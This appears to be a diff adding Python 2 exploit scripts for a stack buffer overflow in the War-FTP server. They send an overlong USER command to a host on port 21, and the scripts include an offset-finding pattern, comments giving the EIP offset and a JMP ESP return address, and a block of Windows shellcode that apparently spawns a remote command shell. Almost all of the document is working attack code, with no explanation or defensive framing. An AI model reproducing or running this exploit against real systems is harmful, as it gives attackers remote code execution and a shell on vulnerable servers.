+#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('11.11.11.6',21))
+response = s.recv(1024)
+print response
+s.send('USER ' + buffer + '\r\n')
+response = s.recv(1024)
+print response
+s.send('PASS PASSWORD\r\n')
+s.close()

warftp/ftpexploitbreakpointjumpesp.py

@@ -0,0 +1,48 @@
+#!/usr/bin/python
+import socket
+
+
+shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +
+"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" +
+"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +
+"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +
+"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +
+"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +
+"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +
+"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +
+"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +
+"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +
+"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" +
+"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" +
+"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+"\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
+"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" +
+"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57" +
+"\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1" +
+"\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63" +
+"\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59" +
+"\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24" +
+"\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56" +
+"\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" +
+"\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" +
+"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
+"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" +
+"\x53\xff\xd5")
+
+buffer = "A" * 485 + "\xD7\x30\x9D\x7C" + "C" * 4 + "\x81\xc4\x24\xfa\xff\xff" + shellcode
+
+#module to jump to is 0x7C9D30D7
+#address is 00AFFD48
+#eip is at byte 485
+#esp is at byte 493, eight bytes away
+#buffer = "A" * 1100
+#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('11.11.11.6',21))
+response = s.recv(1024)
+print response
+s.send('USER ' + buffer + '\r\n')
+response = s.recv(1024)
+print response
+s.send('PASS PASSWORD\r\n')
+s.close()